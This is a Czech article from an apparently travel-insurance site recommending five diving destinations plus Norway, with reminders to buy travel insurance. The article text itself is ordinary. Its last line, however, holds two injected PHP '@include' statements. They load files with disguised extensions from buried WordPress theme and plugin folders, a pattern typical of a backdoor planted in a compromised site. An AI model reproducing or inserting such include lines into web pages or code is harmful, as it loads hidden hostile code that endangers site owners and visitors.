POJIŠTĚNÍ PRO POTÁPĚČE – TIPY NA DESTINACE

5+1 tipů, kam vyrazit za potápěním

Svítící sluníčko, horký písek, lesknoucí se hladina moře, barevné ryby, korálové útesy, pohoda a válení se. Pro někoho skvělá pohoda, pro jiného nuda. Pro ty z vás, které už nebaví klasické dovolenkové opékání na slunci, máme tip. Co takhle zkusit potápění? Pod vodou vám rozhodně nebude horko a uvidíte flóru a faunu, kterou na souši nepotkáte. Kam za potápěním vyrazit, abyste viděli opravdu to nejkrásnější? Přinášíme 5+1 tip na skvělé potápění. Jestliže se rozhodnete vyrazit, nezapomeňte si zřídit speciální cestovní pojištění.

Egypt

Egypt je asi nejdostupnější exotická destinace, kam se dá z Česka vyrazit. Pouhé čtyři hodiny letadlem a dostanete se k nádhernému teplému moři. V Egyptě je velmi oblíbené tzv. potápěčské safari. Lidé jsou ubytování na lodi, se kterou se přesouvají na mořské nejznámější lokality, kde se dělají až čtyři ponory denně.

Thajsko

Thajský podmořský svět je velmi pestrý a vyplatí se ho začít objevovat v malém zálivu ostrůvku Ko Tao, kde zavítá většina začínajících potápěčů. Za nejkrásnější potápěčské destinace jsou pak považovány lokality kolem Phi Phi a Ko Lanty, ale pozor, je zde opravu velká koncentrace turistů.

Filipíny

Přes 7000 ostrovů, bílý písek, průzračná voda, korálový útes Tubbataha (UNESCO), ztroskotané válečné lodě, příjemné klima a velrybí žraloci v zátoce Donson, se kterými se také můžete zkusit potápět. To vše nabízejí Filipíny.

Belize

Moře v Belize je známé svým velmi rozmanitým ekosystémem. Najdete zde velké množství atolů a korálových útesů, které leží v tak malé hloubce, že je některé z nich možné pozorovat i šnorchlováním. Nejznámějším místem je takzvaná Velká modrá díra, ve které je skvěle uchovaný ekosystém. V místním Shark Ray Alley je také kromě potápění možnost zkusit si pomáhat s ošetřováním žraloků a rejnoků.

Indonésie

Indonésie prozatím není masovou záležitostí. Je však rozhodně rájem pro potápěče. Míří zde zejména ti zkušenější, které lákají dosud neobjevené podmořské útesy, barevný podmořský život, velké ryby i vraky lodí. Je zde možné potkat manty či největší kostnatou rybu na světe “mola mola” neboli Měsíčníka svítivého.

Studené Norsko

A co se takhle jednou vydat netradiční cestou a vyrazit za potápěním někam do chladu?

Oblíbenou chladnou destinací je Norsko. Výhodou je, že pokud se zde vydáte na vlastní pěst se stanem a spacákem, máte možnost stanovat naprosto kdekoliv, pokud zachováte slušnost vůči přírodě a lidem. Potápění v chladném moři je trochu odlišné od toho tropického. Chladná voda, hodně živin a tak vypadá nazelenale. Je zde proto i menší viditelnost, zato je zde hodně živočichů i ve velkých hloubkách. Výhodou je také to, že kdekoliv do vody vlezete, vždycky je co vidět. Pozor na proudy! Jsou často silné a nepředvídatelné. Před cestou do Norska je tak velmi důležité mít vyřízené cestovní pojištění.

 


@include "wp-content/themes/lancr/lib/customizer/install/js/include/0164.conf";@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/d/include/0655.jsc";